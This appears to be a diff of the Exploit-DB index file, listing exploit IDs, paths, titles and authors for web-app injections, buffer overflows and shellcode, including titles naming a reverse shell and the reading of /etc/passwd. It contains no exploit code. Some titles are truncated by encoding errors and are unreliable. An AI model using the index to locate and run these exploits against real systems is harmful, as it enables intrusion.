11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0 +14114,platforms/linux/webapps/14114.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-29,"Inj3ct0r Team",linux,webapps,80 +14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote SQL Injection Vulnerability",2010-03-14,snakespc,php,webapps,0 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0 11732,platforms/php/webapps/11732.txt,"Php-Nuke - Local File Include Vulnerability",2010-03-14,ITSecTeam,php,webapps,0 11733,platforms/php/webapps/11733.txt,"phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection",2010-03-14,"Easy Laster",php,webapps,0 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0 11735,platforms/php/webapps/11735.php,"deV!L`z Clanportal 1.5.2 - Remote File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0 +18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0 11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Include",2010-03-15,jdc,php,webapps,0 @@ -10804,6 +10823,7 @@ id,file,description,date,author,platform,type,port 11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow PoC Exploit (0day)",2010-03-22,mr_me,windows,local,0 11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-22,"cr4wl3r ",php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage (index.php) SQL Injection Vulnerability",2010-03-22,Phenom,php,webapps,0 +14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 - SQL Injection Vulnerability",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club SQL Injection Vulnerability",2010-03-22,"Sioma Labs",php,webapps,0 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 @@ -10816,6 +10836,7 @@ id,file,description,date,author,platform,type,port 11847,platforms/windows/webapps/11847.txt,"Joomla Component com_gds SQL Injection Vulnerability",2010-03-23,"DevilZ TM",windows,webapps,0 11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Include Vulnerability",2010-03-23,mat,php,webapps,0 11850,platforms/php/webapps/11850.txt,"Zephyrus CMS (index.php) SQL Injection Vulnerability",2010-03-23,Phenom,php,webapps,0 +14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0 11851,platforms/php/webapps/11851.txt,"Joomla Component Property Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass Vulnerability",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 @@ -10833,7 +10854,7 @@ id,file,description,date,author,platform,type,port 11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 Title XSS Vulnerability",2010-03-24,FormatXformat,php,webapps,0 11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow - Method 2",2010-03-25,sinn3r,windows,local,0 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS SQL Injection Vulnerability",2010-03-25,Inj3ct0r,php,webapps,0 -11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrs Gmez",php,webapps,0 +11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21 @@ -10856,7 +10877,7 @@ id,file,description,date,author,platform,type,port 11895,platforms/php/webapps/11895.txt,"CyberCMS Remote SQL Injection Vuln.",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - [ CSRF ] Create Administrator Account",2010-03-26,bi0,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 -11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rckwrts Auktions System <= 2 - Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 +11898,platforms/php/webapps/11898.py,"Date & Sex Vor und R",2010-03-27,"Easy Laster",php,webapps,0 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 @@ -10885,7 +10906,7 @@ id,file,description,date,author,platform,type,port 11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0 11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,indoushka,asp,webapps,0 11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0 -11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gstebuch <= 2.09 - SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0 +11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT G",2010-03-29,"Easy Laster",php,webapps,0 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0 11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0 11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 @@ -10961,7 +10982,7 @@ id,file,description,date,author,platform,type,port 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-04-03,mr_me,windows,local,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 -12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rckwrts Auktions System - Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0 +12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und R",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 @@ -11158,10 +11179,12 @@ id,file,description,date,author,platform,type,port 12238,platforms/php/webapps/12238.txt,"Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 +15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 +20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - (id) SQL Injection Vulnerability",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 @@ -11213,7 +11236,7 @@ id,file,description,date,author,platform,type,port 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL Injection Vulnerability",2010-04-19,kaMtiEz,php,webapps,0 -12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrs Gmez",php,webapps,0 +12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,chr1x,multiple,remote,0 @@ -11366,7 +11389,7 @@ id,file,description,date,author,platform,type,port 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Include Vulnerability",2010-05-01,"cr4wl3r ",php,webapps,0 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Include Vulnerability",2010-05-01,"cr4wl3r ",php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 -12478,platforms/asp/webapps/12478.txt,"Mesut Manet Haber 1.0 - Auth Bypass Vulnerability",2010-05-02,LionTurk,asp,webapps,0 +12478,platforms/asp/webapps/12478.txt,"Mesut Man",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 @@ -11378,6 +11401,7 @@ id,file,description,date,author,platform,type,port 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Include Vulnerability",2010-05-03,"cr4wl3r ",php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - XSS Vulnerabilities",2010-05-03,mega-itec.com,php,webapps,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit (0day)",2010-05-03,"Inj3ct0r Team",multiple,dos,0 +14025,platforms/php/webapps/14025.txt,"2daybiz Job site Script SQL injection",2010-06-24,Sangteamtham,php,webapps,0 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0day)",2010-05-03,R3d-D3V!L,windows,dos,0 @@ -11417,7 +11441,7 @@ id,file,description,date,author,platform,type,port 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 -12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rckwrts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 +12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart R",2010-05-08,"Easy Laster",php,webapps,0 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 @@ -11475,6 +11499,7 @@ id,file,description,date,author,platform,type,port 12597,platforms/php/webapps/12597.txt,"Press Release Script (page.php id) SQL Injection Vulnerability",2010-05-14,R3d-D3V!L,php,webapps,0 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection Vulnerability",2010-05-14,PrinceofHacking,php,webapps,0 +14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 12601,platforms/php/webapps/12601.txt,"Joomla Component JE Job - Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 @@ -11499,14 +11524,14 @@ id,file,description,date,author,platform,type,port 12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 -12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS, SQL Injection Vulnerability",2010-05-16,Ariko-Security,php,webapps,0 +12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS & SQL Injection Vulnerability",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability",2010-05-17,CoBRa_21,php,webapps,0 12632,platforms/php/webapps/12632.txt,"Joomla Component com_crowdsource SQL Injection",2010-05-17,ByEge,php,webapps,0 12633,platforms/php/webapps/12633.txt,"Joomla Component com_event Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 12634,platforms/php/webapps/12634.txt,"PHP Gamepage SQL Injection Vulnerability",2010-05-17,v4lc0m87,php,webapps,0 12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection Vulnerability",2010-05-17,Ma3sTr0-Dz,php,webapps,0 -12636,platforms/php/webapps/12636.txt,"MidiCart PHP,ASP Shell Upload Vulnerability",2010-05-17,DigitALL,php,webapps,0 -12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection, Local File Inclusion and XSS Vulnerabilities",2010-05-17,mr_me,php,webapps,0 +12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Shell Upload Vulnerability",2010-05-17,DigitALL,php,webapps,0 +12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection & Local File Inclusion & XSS Vulnerabilities",2010-05-17,mr_me,php,webapps,0 12639,platforms/php/webapps/12639.txt,"Joomla Component com_event another SQL Injection vuln",2010-05-17,N/A,php,webapps,0 12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - CSRF",2010-05-17,"John Leitch",windows,webapps,0 12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection Vulnerability",2010-05-17,AntiSecurity,php,webapps,0 @@ -11539,8 +11564,17 @@ id,file,description,date,author,platform,type,port 12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - ""Archive()"" method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 12674,platforms/php/webapps/12674.txt,"webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 -12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sbastien Duquette",php,webapps,0 +30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability",2007-05-28,raylai,linux,local,0 +14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 +12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 +28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 +28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Include Vulnerabilities",2006-06-17,"M.Hasran Addahroni",php,webapps,0 +28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.PHP PageID Remote File Include Vulnerability",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 +28049,platforms/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow Vulnerability",2013-09-03,Asesino04,windows,dos,0 +28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 +28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - (.wav) Crash PoC",2013-09-03,ariarat,windows,dos,0 +28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 - TFTP DoS",2010-05-21,Nullthreat,windows,dos,69 @@ -11551,6 +11585,7 @@ id,file,description,date,author,platform,type,port 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 +14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 @@ -11592,7 +11627,7 @@ id,file,description,date,author,platform,type,port 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 -12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 +12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection Vulnerability",2010-05-25,MN9,php,webapps,0 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"Open&Compact Ftp Server 1.2 - Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 @@ -11613,6 +11648,7 @@ id,file,description,date,author,platform,type,port 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution Vulnerability",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 +14321,platforms/windows/remote/14321.html,"Image22 - ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection Vulnerability",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI Vulnerability",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja CMS SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 @@ -11700,12 +11736,14 @@ id,file,description,date,author,platform,type,port 13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 reverse portbind 129 bytes",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 execve /bin/sh 45 bytes",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 execve /bin/sh 46 bytes",2004-09-26,vade79,bsdi_x86,shellcode,0 +30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0 +30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 execve /bin/sh toupper evasion 97 bytes",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 -13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 setreuid, execve(pfctl -d) 56 bytes",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 +13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 setreuid_ execve(pfctl -d) (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 13263,platforms/freebsd_x86/shellcode/13263.txt,"freebsd/x86 connect back.send.exit /etc/passwd 112 bytes",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 13264,platforms/freebsd_x86/shellcode/13264.txt,"freebsd/x86 kill all processes 12 bytes",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 -13265,platforms/freebsd_x86/shellcode/13265.c,"freebsd/x86 rev connect, recv, jmp, return results 90 bytes",2008-09-05,sm4x,freebsd_x86,shellcode,0 +13265,platforms/freebsd_x86/shellcode/13265.c,"freebsd/x86 rev connect_ recv_ jmp_ return results (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 13266,platforms/freebsd_x86/shellcode/13266.asm,"freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes",2008-08-25,sm4x,freebsd_x86,shellcode,0 13267,platforms/freebsd_x86/shellcode/13267.asm,"freebsd/x86 reverse portbind /bin/sh 89 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 13268,platforms/freebsd_x86/shellcode/13268.asm,"freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 @@ -11716,7 +11754,7 @@ id,file,description,date,author,platform,type,port 13273,platforms/freebsd_x86/shellcode/13273.c,"freebsd/x86 execve /bin/sh 23 bytes (2)",2004-09-26,marcetam,freebsd_x86,shellcode,0 13274,platforms/freebsd_x86/shellcode/13274.c,"freebsd/x86 execve /bin/sh 37 bytes",2004-09-26,preedator,freebsd_x86,shellcode,0 13275,platforms/freebsd_x86/shellcode/13275.c,"freebsd/x86 kldload /tmp/o.o 74 bytes",2004-09-26,dev0id,freebsd_x86,shellcode,0 -13276,platforms/freebsd_x86/shellcode/13276.c,"freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 +13276,platforms/freebsd_x86/shellcode/13276.c,"freebsd/x86 chown 0:0 _ chmod 6755 & execve /tmp/sh (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 13277,platforms/freebsd_x86/shellcode/13277.c,"freebsd/x86 execve /tmp/sh 34 bytes",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 13278,platforms/freebsd_x86/shellcode/13278.asm,"freebsd/x86 connect 102 bytes",2004-09-26,Scrippie,freebsd_x86,shellcode,0 13279,platforms/freebsd_x86-64/shellcode/13279.c,"freebsd/x86-64 exec(""/bin/sh"") shellcode 31 bytes",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 @@ -11754,17 +11792,17 @@ id,file,description,date,author,platform,type,port 13312,platforms/lin_x86/shellcode/13312.c,"linux/x86 /bin/sh polymorphic shellcode 48 bytes",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes",2009-07-10,Rick,lin_x86,shellcode,0 13314,platforms/lin_x86/shellcode/13314.c,"linux/x86 